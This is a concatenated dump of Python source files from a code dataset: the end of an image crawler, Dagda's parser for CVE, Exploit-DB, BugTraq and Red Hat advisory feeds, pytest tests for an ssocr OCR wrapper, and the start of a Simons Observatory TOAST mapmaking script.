# 入口页面, 可以换成别的\n# full_url = url + url_values\nfull_url = 'https://www.google.com/search?q=tupia&tbm=isch&tbo=u&source=univ&sa=X&ved=0ahUKEwikkZWyg9XSAhVLj1QKHTohBu8QsAQIGw&biw=1366&bih=647'\n\n# 入队最初的页面\nqueue.append(full_url)\ncnt = 0\n\nwhile queue:\n full_url = queue.popleft() # 队首元素出队\n visited |= {full_url} # 标记为已访问\n print('已经抓取: ' + str(cnt) + ' 正在抓取 <--- ' + full_url)\n cnt += 1\n\n try:\n # 抓取页面\n urlop = urllib.request.urlopen(full_url, timeout=10)\n except Exception:\n print(\"超时\")\n continue\n\n # 判断是否为html页面\n if 'html' not in urlop.getheader('Content-Type'):\n continue\n\n # 避免程序异常中止, 用try..catch处理异常\n try:\n #转换为utf-8码\n data = urlop.read().decode('utf-8')\n except Exception as e:\n print(e)\n continue\n\n\n\n# 正则表达式提取页面中所有队列, 并判断是否已经访问过, 然后加入待爬队列\n linkre = re.compile(\"href=['\\\"]([^\\\"'>]*?)['\\\"].*?\")\n for x in linkre.findall(data): ##返回所有有匹配的列表\n if 'http' in x and x not in visited: ##判断是否为http协议链接,并判断是否抓取过\n queue.append(x)\n print('加入队列 ---> ' + x)\n\n if not os.path.exists('D:\\E'):\n os.makedirs('D:\\E')\n getImg(data)\n\n\n\n","sub_path":"crawler/simple_search.py","file_name":"simple_search.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"551770695","text":"#\n# Licensed to Dagda under one or more contributor\n# license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright\n# ownership. Dagda licenses this file to you under\n# the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport json\nimport gzip\nimport re\nimport requests\nimport zlib\nimport defusedxml.ElementTree as ET\nfrom zipfile import ZipFile\nimport os\nfrom io import BytesIO\nimport datetime\nimport tarfile\n\n\nACCESS_VECTOR = {'L': 'Local access', 'A': 'Adjacent Network', 'N': 'Network'}\nACCESS_COMPLEXITY = {'H': 'High', 'M': 'Medium', 'L': 'Low'}\nAUTHENTICATION = {'N': 'None required', 'S': 'Requires single instance', 'M': 'Requires multiple instances'}\nCONFIDENTIALITY_IMPACT = {'N': 'None', 'P': 'Partial', 'C': 'Complete'}\nINTEGRITY_IMPACT = {'N': 'None', 'P': 'Partial', 'C': 'Complete'}\nAVAILABILITY_IMPACT = {'N': 'None', 'P': 'Partial', 'C': 'Complete'}\n\nFEATURES_LIST = [ACCESS_VECTOR, ACCESS_COMPLEXITY, AUTHENTICATION, CONFIDENTIALITY_IMPACT, INTEGRITY_IMPACT,\n AVAILABILITY_IMPACT]\n\n\n# Gets HTTP resource content\ndef get_http_resource_content(url):\n r = requests.get(url)\n return r.content\n\n\n# Extract vector from CVE\ndef extract_vector(initial_vector):\n new_vector = initial_vector[1:-1].split('/')\n final_vector = []\n for i in range(len(new_vector)):\n final_vector.append(FEATURES_LIST[i][new_vector[i][-1]])\n return new_vector, final_vector\n\n\n# Gets CVE list from compressed file\ndef get_cve_list_from_file(compressed_content, year):\n cve_set = set()\n xml_file_content = zlib.decompress(compressed_content, 16 + zlib.MAX_WBITS)\n root = ET.fromstring(xml_file_content)\n for entry in root.findall(\"{http://scap.nist.gov/schema/feed/vulnerability/2.0}entry\"):\n vuln_soft_list = entry.find(\"{http://scap.nist.gov/schema/vulnerability/0.4}vulnerable-software-list\")\n if vuln_soft_list is not None:\n for vuln_product in vuln_soft_list.findall(\n \"{http://scap.nist.gov/schema/vulnerability/0.4}product\"):\n splitted_product = vuln_product.text.split(\":\")\n if len(splitted_product) > 4:\n item = entry.attrib.get(\"id\") + \"#\" + 
splitted_product[2] + \"#\" + splitted_product[3] + \"#\" + \\\n splitted_product[4] + \"#\" + str(year)\n if item not in cve_set:\n cve_set.add(item)\n return list(cve_set)\n\n\n# Gets description from CVE compresed files\ndef get_cve_description_from_file(compressed_content):\n cve_info_set = {}\n zip_file = ZipFile(BytesIO(compressed_content))\n filename = zip_file.extract(zip_file.filelist[0])\n root = ET.parse(filename).getroot()\n os.remove(filename)\n for child in root:\n try:\n cveid = child.attrib['name']\n aux = child.attrib['published'].split('-')\n pub_date = datetime.datetime(int(aux[0]), int(aux[1]), int(aux[2]))\n aux = child.attrib['modified'].split('-')\n mod_date = datetime.datetime(int(aux[0]), int(aux[1]), int(aux[2]))\n cvss_base = float(child.attrib['CVSS_base_score'])\n cvss_impact = float(child.attrib['CVSS_impact_subscore'])\n cvss_exploit = float(child.attrib['CVSS_exploit_subscore'])\n vector, features = extract_vector(child.attrib['CVSS_vector'])\n summary = child[0][0].text\n cve_info_set[cveid] = {\"cveid\": cveid,\n \"pub_date\": pub_date,\n \"mod_date\": mod_date,\n \"summary\": summary,\n \"cvss_base\": cvss_base,\n \"cvss_impact\": cvss_impact,\n \"cvss_exploit\": cvss_exploit,\n \"cvss_access_vector\": features[0],\n \"cvss_access_complexity\": features[1],\n \"cvss_authentication\": features[2],\n \"cvss_confidentiality_impact\": features[3],\n \"cvss_integrity_impact\": features[4],\n \"cvss_availability_impact\": features[5],\n \"cvss_vector\": vector,\n \"cweid\": \"CWE-0\"\n }\n except KeyError:\n # Any error continue\n pass\n return dict(cve_info_set)\n\n\n# Update cweid info at cve description\ndef get_cve_cweid_from_file(compressed_content, cve_dict):\n zip = ZipFile(BytesIO(compressed_content))\n zip_file = ZipFile(BytesIO(compressed_content))\n filename = zip_file.extract(zip_file.filelist[0])\n root = ET.parse(filename).getroot()\n os.remove(filename)\n cwe_ns = \"{http://scap.nist.gov/schema/vulnerability/0.4}\"\n 
default_ns = \"{http://scap.nist.gov/schema/feed/vulnerability/2.0}\"\n for entry in root.findall('{ns}entry'.format(ns=default_ns)):\n id = entry.attrib[\"id\"]\n cwe = entry.find('{nsd}cwe'.format(nsd=cwe_ns))\n if cwe is not None:\n if id in cve_dict.keys():\n cve_dict[id][\"cweid\"] = str(cwe.attrib[\"id\"])\n return dict(cve_dict)\n\n\n# Gets Exploit_db list from csv file\ndef get_exploit_db_list_from_csv(csv_content):\n items = set()\n exploits_details = []\n for line in csv_content.split(\"\\n\"):\n item_added = False\n splitted_line = line.split(',')\n if splitted_line[0] != 'id' and len(splitted_line) > 3:\n exploit_db_id = splitted_line[0]\n description = splitted_line[2][1:len(splitted_line[2]) - 1]\n if '-' in description:\n description = description[0:description.index('-')].lstrip().rstrip().lower()\n iterator = re.finditer(\"([0-9]+(\\.[0-9]+)+)\", description)\n match = next(iterator, None)\n if match:\n version = match.group()\n description = description[:description.index(version)].rstrip().lstrip()\n item = str(exploit_db_id) + \"#\" + description + \"#\" + str(version)\n if item not in items:\n items.add(item)\n item_added = True\n for match in iterator:\n version = match.group()\n item = str(exploit_db_id) + \"#\" + description + \"#\" + str(version)\n if item not in items:\n items.add(item)\n item_added = True\n else:\n if '<' not in description and '>' not in description:\n iterator = re.finditer(\"\\s([0-9])+$\", description)\n match = next(iterator, None)\n if match:\n version = match.group()\n description = description[:description.index(version)].rstrip().lstrip()\n version = version.rstrip().lstrip()\n item = str(exploit_db_id) + \"#\" + description + \"#\" + str(version)\n if item not in items:\n items.add(item)\n item_added = True\n # Generate exploit details\n if item_added:\n details = {}\n details['exploit_db_id'] = int(splitted_line[0])\n details['description'] = splitted_line[2][1:len(splitted_line[2]) - 1]\n details['platform'] = 
splitted_line[6] if splitted_line[6] is not None else ''\n details['type'] = splitted_line[5] if splitted_line[5] is not None else ''\n try:\n details['port'] = int(splitted_line[7])\n except ValueError:\n details['port'] = 0\n exploits_details.append(details)\n # Return\n return list(items), exploits_details\n\n\n# Gets BugTraq lists from gz file\ndef get_bug_traqs_lists_from_file(compressed_file):\n decompressed_file = gzip.GzipFile(fileobj=compressed_file)\n bid_list = [line.decode(\"utf-8\") for line in decompressed_file.readlines()]\n return get_bug_traqs_lists_from_online_mode(bid_list)\n\n\n# Gets BugTraq lists from online mode\ndef get_bug_traqs_lists_from_online_mode(bid_list):\n items = set()\n output_array = []\n extended_info_array = []\n for line in bid_list:\n try:\n json_data = json.loads(line)\n parse_bid_from_json(json_data, items)\n del json_data['vuln_products']\n extended_info_array.append(json_data)\n except (TypeError, ValueError):\n # It is not a JSON format so the line is ignored\n pass\n # Bulk insert\n if len(items) > 8000:\n output_array.append(list(items))\n items = set()\n # Final bulk insert\n if len(items) > 0:\n output_array.append(list(items))\n # Return\n return output_array, extended_info_array\n\n\n# Parses BID from json data\ndef parse_bid_from_json(json_data, items):\n bugtraq_id = json_data['bugtraq_id']\n vuln_products = json_data['vuln_products']\n for vuln_product in vuln_products:\n matchObj = re.search(\"[\\s\\-]([0-9]+(\\.[0-9]+)*)\", vuln_product)\n if matchObj:\n version = matchObj.group()\n version = version.rstrip().lstrip()\n if version.startswith('-'):\n version = version[1:]\n if version:\n product = vuln_product[:vuln_product.index(version) - 1].rstrip().lstrip()\n item = str(bugtraq_id) + \"#\" + product.lower() + \"#\" + str(version)\n if item not in items:\n items.add(item)\n\n\n# Gets RHSA (Red Hat Security Advisory) and RHBA (Red Hat Bug Advisory) lists from bz2 file\ndef 
get_rhsa_and_rhba_lists_from_file(bz2_file):\n # Init\n tar = tarfile.open(mode='r:bz2', fileobj=BytesIO(bz2_file))\n rhsa_list = []\n rhsa_id_list = []\n rhba_list = []\n rhba_id_list = []\n rhsa_info_list = []\n rhsa_info_id_list = []\n rhba_info_list = []\n rhba_info_id_list = []\n for xml_file in tar.getmembers():\n if xml_file.size > 0:\n xml_file_content = tar.extractfile(xml_file.name)\n root = ET.parse(xml_file_content).getroot().find('{http://oval.mitre.org/XMLSchema/oval-definitions-5}definitions')\n for entry in root.findall('{http://oval.mitre.org/XMLSchema/oval-definitions-5}definition'):\n # Init\n metadata = entry.find('{http://oval.mitre.org/XMLSchema/oval-definitions-5}metadata')\n detail_info = {}\n\n # Get IDs\n rhsa_id = None\n rhba_id = None\n cves = []\n for reference in metadata.findall(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}reference\"):\n # Get RHSA (Red Hat Security Advisory)\n if reference.attrib['source'] == 'RHSA':\n rhsa_id = reference.attrib['ref_id']\n if \"-\" in rhsa_id[5:]:\n rhsa_id = rhsa_id[:rhsa_id.index(\"-\", 5)]\n # RHBA (Red Hat Bug Advisory)\n if reference.attrib['source'] == 'RHBA':\n rhba_id = reference.attrib['ref_id']\n if \"-\" in rhba_id[5:]:\n rhba_id = rhba_id[:rhba_id.index(\"-\", 5)]\n # Get related CVEs\n if reference.attrib['source'] == 'CVE':\n cves.append(reference.attrib['ref_id'])\n\n detail_info['cve'] = cves\n\n # Get title and description\n detail_info['title'] = metadata.findtext('{http://oval.mitre.org/XMLSchema/oval-definitions-5}title')\n detail_info['description'] = metadata.findtext('{http://oval.mitre.org/XMLSchema/oval-definitions-5}description')\n\n # Get severity\n detail_info['severity'] = metadata.find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}advisory\") \\\n .find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}severity\").text\n # Append detail info\n if rhsa_id is not None:\n detail_info['rhsa_id'] = rhsa_id\n if rhsa_id not in rhsa_info_id_list:\n 
rhsa_info_id_list.append(rhsa_id)\n rhsa_info_list.append(detail_info)\n if rhba_id is not None:\n detail_info['rhba_id'] = rhba_id\n if rhba_id not in rhba_info_id_list:\n rhba_info_id_list.append(rhba_id)\n rhba_info_list.append(detail_info)\n\n # Get vulnerable products\n affected_cpe_list = metadata.find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}advisory\") \\\n .find(\"{http://oval.mitre.org/XMLSchema/oval-definitions-5}affected_cpe_list\")\n for cpe in affected_cpe_list:\n if cpe.text is not None:\n info_item = {}\n splitted_product = cpe.text.split(\":\")\n info_item['vendor'] = splitted_product[2]\n info_item['product'] = splitted_product[3]\n try:\n info_item['version'] = splitted_product[4]\n except IndexError:\n info_item['version'] = '-'\n\n tmp = '#' + info_item['vendor'] + '#' + info_item['product'] + '#' + info_item['version']\n if rhsa_id is not None:\n info_item['rhsa_id'] = rhsa_id\n tmp = rhsa_id + tmp\n if tmp not in rhsa_id_list:\n rhsa_id_list.append(tmp)\n rhsa_list.append(info_item)\n if rhba_id is not None:\n info_item['rhba_id'] = rhba_id\n tmp = rhba_id + tmp\n if tmp not in rhba_id_list:\n rhba_id_list.append(tmp)\n rhba_list.append(info_item)\n\n # Return\n return rhsa_list, rhba_list, rhsa_info_list, rhba_info_list\n","sub_path":"dagda/vulnDB/ext_source_util.py","file_name":"ext_source_util.py","file_ext":"py","file_size_in_byte":15058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308031235","text":"import os\nimport sys\nimport tempfile\n\nimport pytest\n\nimport ocr\nfrom ocr import ssocr\n\nROOT = os.path.dirname(__file__)\nIMAGE_ROOT = os.path.join(ROOT, 'images')\nsix_digits_path = os.path.join(IMAGE_ROOT, 'six_digits.png')\ninside_box_path = os.path.join(IMAGE_ROOT, 'inside_box.png')\n\n\n# NOTE: This test must be first function in this module\n# because it adds the ssocr executable to the PATH\n@pytest.mark.skipif(sys.platform != 'win32', reason='non-Windows 
OS')\ndef test_environ_path():\n # make sure the ssocr executable is not available on PATH\n environ_path = None\n for path in os.environ['PATH'].split(os.pathsep):\n if os.path.isfile(os.path.join(path, 'ssocr.exe')):\n environ_path = path\n os.environ['PATH'] = os.environ['PATH'].replace(path, '')\n break\n\n # check that the error message is correct when the ssocr executable is not available\n with pytest.raises(FileNotFoundError, match=r'ocr.set_ssocr_path()'):\n ssocr.apply(six_digits_path, absolute_threshold=False)\n\n # make sure that the ssocr executable is available for the remainder of the tests in this module\n if environ_path:\n os.environ['PATH'] += os.pathsep + environ_path\n else:\n p = os.path.join(ROOT, '..', 'resources', 'ssocr-win64', 'bin', 'ssocr.exe')\n ssocr.set_ssocr_path(p)\n\n\ndef test_invalid_image():\n # must raise ValueError instead of FileNotFoundError\n for obj in ['does/not/exist.jpg', 'X'*10000 + '.png']:\n with pytest.raises(ValueError, match=r'^Invalid path or base64 string'):\n ssocr.apply(obj)\n\n\n@pytest.mark.parametrize('ext', ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff'])\ndef test_six_digits(ext):\n expected = '431432'\n kwargs = {'absolute_threshold': False, 'iter_threshold': True}\n\n p = tempfile.gettempdir() + '/six_digits.' + ext\n ocr.save(p, six_digits_path)\n\n assert ssocr.apply(p, **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_bytes(p), **kwargs) == expected\n with open(p, mode='rb') as fp:\n assert ssocr.apply(fp.read(), **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_base64(p), **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_cv2(p), **kwargs) == expected\n assert ssocr.apply(ocr.utils.to_pil(p), **kwargs) == expected\n\n for fcn in [ocr.utils.to_cv2, ocr.utils.to_pil]:\n cropped = ocr.utils.crop(fcn(p), 0, 0, 100, 73)\n assert ssocr.apply(cropped, **kwargs) == expected[:2]\n\n os.remove(p)\n assert not os.path.isfile(p)\n\n\ndef test_inside_box():\n expected = '086861'\n threshold = 21. 
# as a percentage\n cv2 = ocr.utils.to_cv2(inside_box_path)\n pil = ocr.utils.to_pil(inside_box_path)\n for obj in [cv2, pil]:\n cropped = ocr.utils.crop(obj, 230, 195, 220, 60)\n assert ssocr.apply(cropped, threshold=threshold, absolute_threshold=False) == expected\n\n thresholded = ocr.utils.threshold(cropped, int(255 * threshold/100.))\n assert ssocr.apply(thresholded) == expected\n\n\ndef test_version():\n # explicitly match the version to check for a new release\n # when running the tests on GitHub Actions\n assert ssocr.version() == '2.22.1'\n\n info = ssocr.version(include_copyright=True)\n assert info.startswith('Seven Segment Optical Character Recognition')\n assert '@unix-ag.uni-kl.de' in info\n\n\ndef test_set_ssocr_path():\n # the file exists but the basename is not ssocr[.exe]\n for path in [__file__, six_digits_path]:\n assert os.path.isfile(path)\n with pytest.raises(FileNotFoundError, match='Invalid'):\n ssocr.set_ssocr_path(path)\n\n # a valid top-level directory but cannot find the ssocr executable\n for path in [ROOT]:\n assert os.path.isdir(path) and path.endswith('tests')\n with pytest.raises(FileNotFoundError, match='Cannot find'):\n ssocr.set_ssocr_path(path)\n\n # not a file nor a directory\n for path in ['invalid/ssocr', '/does/not/exist/ssocr.exe', 'ssocr.exe']:\n assert not os.path.exists(path)\n with pytest.raises(FileNotFoundError, match='not a valid file or directory'):\n ssocr.set_ssocr_path(path)\n\n # ensure that this does not raise an exception\n if sys.platform == 'win32':\n # finds the ssocr.exe executable in the rpi-ocr/resources/ssocr-win64 directory\n root = os.path.join(ROOT, '..')\n ssocr.set_ssocr_path(root)\n else:\n ssocr.set_ssocr_path('/usr/local/bin/ssocr')\n\n\ndef test_enums():\n for obj in ['BLACK', 'black', ssocr.Colour.BLACK]:\n assert ssocr.Colour.get_value(obj) == 'black'\n\n for obj in ['WHITE', 'white', ssocr.Colour.WHITE]:\n assert ssocr.Colour.get_value(obj) == 'white'\n\n for obj in ['Digits', 'digits', 
ssocr.Charset.DIGITS]:\n assert ssocr.Charset.get_value(obj) == 'digits'\n\n for obj in ['DECIMAL', 'decimal', ssocr.Charset.DECIMAL]:\n assert ssocr.Charset.get_value(obj) == 'decimal'\n\n for obj in ['HEX', 'hex', ssocr.Charset.HEX]:\n assert ssocr.Charset.get_value(obj) == 'hex'\n\n for obj in ['FULL', 'full', ssocr.Charset.FULL]:\n assert ssocr.Charset.get_value(obj) == 'full'\n\n for obj in ['REC601', 'rec601', ssocr.Luminance.REC601]:\n assert ssocr.Luminance.get_value(obj) == 'rec601'\n\n for obj in ['REC709', 'rec709', ssocr.Luminance.REC709]:\n assert ssocr.Luminance.get_value(obj) == 'rec709'\n\n for obj in ['LINEAR', 'linear', ssocr.Luminance.LINEAR]:\n assert ssocr.Luminance.get_value(obj) == 'linear'\n\n for obj in ['MINIMUM', 'minimum', ssocr.Luminance.MINIMUM]:\n assert ssocr.Luminance.get_value(obj) == 'minimum'\n\n for obj in ['MAXIMUM', 'maximum', ssocr.Luminance.MAXIMUM]:\n assert ssocr.Luminance.get_value(obj) == 'maximum'\n\n for obj in ['RED', 'red', ssocr.Luminance.RED]:\n assert ssocr.Luminance.get_value(obj) == 'red'\n\n for obj in ['GREEN', 'green', ssocr.Luminance.GREEN]:\n assert ssocr.Luminance.get_value(obj) == 'green'\n\n for obj in ['BLUE', 'blue', ssocr.Luminance.BLUE]:\n assert ssocr.Luminance.get_value(obj) == 'blue'\n\n with pytest.raises(ValueError, match=r'does not contain'):\n ssocr.Colour.get_value('invalid')\n\n with pytest.raises(ValueError, match=r'does not contain'):\n ssocr.Charset.get_value('invalid')\n\n with pytest.raises(ValueError, match=r'does not contain'):\n ssocr.Luminance.get_value('invalid')\n\n with pytest.raises(TypeError):\n ssocr.Luminance.get_value(1)\n\n\ndef test_debug_enabled():\n out = ssocr.apply(six_digits_path, iter_threshold=True, absolute_threshold=False, debug=True)\n assert out.startswith('======')\n assert 'image width: 280\\nimage height: 73' in out\n assert 'Display as seen by ssocr:' in out\n assert out.endswith('431432')\n\n\ndef test_hexadecimal_enabled():\n out = 
ssocr.apply(six_digits_path, iter_threshold=True, absolute_threshold=False, as_hex=True)\n assert out == '2e:6d:24:2e:6d:5d'\n\n\ndef test_absolute_threshold_enabled():\n with pytest.raises(RuntimeError, match=r'found only 1 of 6 digits'):\n ssocr.apply(six_digits_path, absolute_threshold=True, num_digits=6)\n\n\ndef test_omit_decimal_point():\n out = ssocr.apply(six_digits_path, iter_threshold=True, absolute_threshold=False, omit_decimal_point=True)\n assert out == '431432'\n","sub_path":"tests/test_ssocr.py","file_name":"test_ssocr.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245394564","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019-2021 Simons Observatory.\n# Full license can be found in the top level \"LICENSE\" file.\n\n\"\"\"\nThis workflow runs basic data reduction and map-making:\n\n- A single MPI process group is used\n\n- All input observations are loaded and made into the output map\n\nIn particular, this script is designed for testing mapmaking techniques on data that\nalready exists on disk. It does not simulate data and it is not a full workflow for\nrunning null tests, building observation matrices, etc.\n\nYou can see the automatically generated command line options with:\n\n toast_so_map.py --help\n\nOr you can dump a config file with all the default values with:\n\n toast_so_map.py --default_toml config.toml\n\nThis script contains just comments about what is going on. 
For details about all the\noptions for a specific Operator, see the documentation or use the help() function from\nan interactive python session.\n\n\"\"\"\n\nimport argparse\nimport datetime\nimport os\nimport sys\nimport traceback\n\nimport numpy as np\n\nfrom astropy import units as u\n\n# Import sotodlib.toast first, since that sets default object names\n# to use in toast.\nimport sotodlib.toast as sotoast\n\nimport toast\nimport toast.ops\nfrom toast.mpi import MPI, Comm\nfrom toast.observation import default_values as defaults\n\nfrom .. import ops as so_ops\n\n# Make sure pixell uses a reliable FFT engine\nimport pixell.fft\n\npixell.fft.engine = \"fftw\"\n\n\ndef parse_config(operators, templates, comm):\n \"\"\"Parse command line arguments and load any config files.\n\n Return the final config, remaining args, and job size args.\n\n \"\"\"\n # Argument parsing\n parser = argparse.ArgumentParser(description=\"Make maps of SO data\")\n\n # Arguments specific to this script\n\n parser.add_argument(\n \"--obs_hdf5\",\n required=False,\n action=\"extend\",\n nargs=\"*\",\n help=\"Path to a TOAST hdf5 observation dump (can use multiple times)\",\n )\n\n parser.add_argument(\n \"--obs_book\",\n required=False,\n action=\"extend\",\n nargs=\"*\",\n help=\"Path to a L3 book directory (can use multiple times)\",\n )\n\n parser.add_argument(\n \"--obs_raw\",\n required=False,\n action=\"extend\",\n nargs=\"*\",\n help=\"Path to raw data directory (can use multiple times)\",\n )\n\n parser.add_argument(\n \"--band\",\n required=False,\n default=None,\n help=\"Only use detectors from this band (e.g. LAT_f150, SAT_f040)\",\n )\n\n parser.add_argument(\n \"--wafer_slots\",\n required=False,\n default=None,\n help=\"Comma-separated list of wafer slots to use. 
\",\n )\n\n parser.add_argument(\n \"--out_dir\",\n required=False,\n type=str,\n default=\"output_maps\",\n help=\"The output directory\",\n )\n\n # Build a config dictionary starting from the operator defaults, overriding with any\n # config files specified with the '--config' commandline option, followed by any\n # individually specified parameter overrides.\n\n config, args, jobargs = toast.parse_config(\n parser,\n operators=operators,\n templates=templates,\n )\n\n # Create our output directory\n if comm is None or comm.rank == 0:\n if not os.path.isdir(args.out_dir):\n os.makedirs(args.out_dir, exist_ok=True)\n\n # Log the config that was actually used at runtime.\n outlog = os.path.join(args.out_dir, \"config_log.toml\")\n toast.config.dump_toml(outlog, config, comm=comm)\n\n return config, args, jobargs\n\n\ndef use_full_pointing(job):\n # Are we using full pointing? We determine this from whether the binning operator\n # used in the solve has full pointing enabled.\n full_pointing = False\n if job.operators.binner.full_pointing:\n full_pointing = True\n return full_pointing\n\n\ndef job_create(config, comm):\n # Instantiate our objects that were configured from the command line / files\n job = toast.create_from_config(config)\n\n # For this workflow, we will just use one process group\n full_pointing = use_full_pointing(job)\n if comm is None:\n group_size = 1\n else:\n group_size = comm.size\n return job, group_size, full_pointing\n\n\ndef select_pointing(job, args, data):\n \"\"\"Select the pixelization scheme for both the solver and final binning.\"\"\"\n log = toast.utils.Logger.get()\n\n ops = job.operators\n\n n_enabled_solve = np.sum(\n [\n ops.pixels_wcs_azel.enabled,\n ops.pixels_wcs_radec.enabled,\n ops.pixels_healpix_radec.enabled,\n ]\n )\n if n_enabled_solve != 1:\n raise RuntimeError(\n \"Only one pixelization operator should be enabled for the solver.\"\n )\n\n n_enabled_final = np.sum(\n [\n ops.pixels_wcs_azel_final.enabled,\n 
ops.pixels_wcs_radec_final.enabled,\n ops.pixels_healpix_radec_final.enabled,\n ]\n )\n if n_enabled_final > 1:\n raise RuntimeError(\n \"At most, one pixelization operator can be enabled for the final binning.\"\n )\n\n # Configure Az/El and RA/DEC boresight and detector pointing and weights\n\n ops.det_pointing_azel.boresight = defaults.boresight_azel\n ops.det_pointing_radec.boresight = defaults.boresight_radec\n\n ops.pixels_wcs_azel.detector_pointing = ops.det_pointing_azel\n ops.pixels_wcs_radec.detector_pointing = ops.det_pointing_radec\n ops.pixels_healpix_radec.detector_pointing = ops.det_pointing_radec\n\n ops.pixels_wcs_azel_final.detector_pointing = ops.det_pointing_azel\n ops.pixels_wcs_radec_final.detector_pointing = ops.det_pointing_radec\n ops.pixels_healpix_radec_final.detector_pointing = ops.det_pointing_radec\n\n ops.weights_azel.detector_pointing = ops.det_pointing_azel\n ops.weights_radec.detector_pointing = ops.det_pointing_radec\n\n if job.has_HWP:\n ops.weights_azel.hwp_angle = defaults.hwp_angle\n ops.weights_radec.hwp_angle = defaults.hwp_angle\n\n # Select Pixelization and weights for solve and final binning\n\n if ops.pixels_wcs_azel.enabled:\n job.pixels_solve = ops.pixels_wcs_azel\n job.weights_solve = ops.weights_azel\n elif ops.pixels_wcs_radec.enabled:\n job.pixels_solve = ops.pixels_wcs_radec\n job.weights_solve = ops.weights_radec\n else:\n job.pixels_solve = ops.pixels_healpix_radec\n job.weights_solve = ops.weights_radec\n job.weights_final = job.weights_solve\n\n if n_enabled_final == 0:\n # Use same as solve\n job.pixels_final = job.pixels_solve\n else:\n if ops.pixels_wcs_azel_final.enabled:\n job.pixels_final = ops.pixels_wcs_azel_final\n elif ops.pixels_wcs_radec_final.enabled:\n job.pixels_final = ops.pixels_wcs_radec_final\n else:\n job.pixels_final = ops.pixels_healpix_radec_final\n log.info_rank(\n f\"Template solve using pixelization: {job.pixels_solve.name}\",\n comm=data.comm.comm_world,\n )\n log.info_rank(\n 
f\"Template solve using weights: {job.weights_solve.name}\",\n comm=data.comm.comm_world,\n )\n log.info_rank(\n f\"Final binning using pixelization: {job.pixels_final.name}\",\n comm=data.comm.comm_world,\n )\n log.info_rank(\n f\"Final binning using weights: {job.weights_final.name}\",\n comm=data.comm.comm_world,\n )\n\n\ndef load_data(job, args, toast_comm):\n log = toast.utils.Logger.get()\n ops = job.operators\n tmpls = job.templates\n\n # Create the (initially empty) data\n\n data = toast.Data(comm=toast_comm)\n\n # Timer for reporting the progress\n timer = toast.timing.Timer()\n timer.start()\n\n ops.mem_count.prefix = \"Before Data Load\"\n ops.mem_count.apply(data)\n\n # Load all of our toast HDF5 datasets\n\n job.has_HWP = False\n for hobs in list(args.obs_hdf5):\n log.info_rank(f\"Starting load of HDF5 data {hobs}\", comm=data.comm.comm_group)\n ob = toast.io.load_hdf5(\n hobs,\n toast_comm,\n process_rows=toast_comm.group_size,\n meta=None,\n detdata=None,\n shared=None,\n intervals=None,\n force_serial=True,\n )\n if defaults.hwp_angle in ob.shared:\n job.has_HWP = True\n # print(\"boresight_radec: \", ob.shared[\"boresight_radec\"].data)\n # print(\"boresight_azel: \", ob.shared[\"boresight_azel\"].data)\n # print(\"shared_flags: \", ob.shared[\"flags\"].data)\n # bad = (ob.shared[\"flags\"].data & defaults.shared_mask_invalid) != 0\n # print(\"shared_flags invalid: \", np.count_nonzero(bad))\n # print(\"det_flags: \", ob.detdata[\"flags\"].data)\n # print(\"noise: \", ob[\"noise_model\"])\n data.obs.append(ob)\n log.info_rank(\n f\"Finished load of HDF5 data {hobs} in\",\n comm=data.comm.comm_group,\n timer=timer,\n )\n ops.mem_count.prefix = f\"After Loading {hobs}\"\n ops.mem_count.apply(data)\n\n # Load all of our book directories\n if args.obs_book is not None and len(args.obs_book) > 0:\n raise NotImplementedError(\"Book loading not supported until PR #183 is merged\")\n\n # Load raw data\n if args.obs_raw is not None and len(args.obs_raw) > 
0:\n raise NotImplementedError(\"Raw loading not supported until PR #183 is merged\")\n\n if len(data.obs) == 0:\n raise RuntimeError(\"No input data specified!\")\n\n return data\n\n\ndef reduce_data(job, args, data):\n log = toast.utils.Logger.get()\n ops = job.operators\n tmpls = job.templates\n\n world_comm = data.comm.comm_world\n\n # Timer for reporting the progress\n timer = toast.timing.Timer()\n timer.start()\n\n # Set up pointing, pixelization, and weights\n\n select_pointing(job, args, data)\n\n # Set up pointing matrices for binning operators\n\n ops.binner.pixel_pointing = job.pixels_solve\n ops.binner.stokes_weights = job.weights_solve\n\n ops.binner_final.pixel_pointing = job.pixels_final\n ops.binner_final.stokes_weights = job.weights_final\n\n # If we are not using a different binner for our final binning, use the same one\n # as the solve.\n if not ops.binner_final.enabled:\n ops.binner_final = ops.binner\n\n # Flag Sun, Moon and the planets\n\n ops.flag_sso.detector_pointing = ops.det_pointing_azel\n if ops.flag_sso.enabled:\n ops.flag_sso.apply(data)\n log.info_rank(\"Flagged SSOs in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After flagging SSOs\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"SSO Flagging disabled\", comm=world_comm)\n\n # Noise model. 
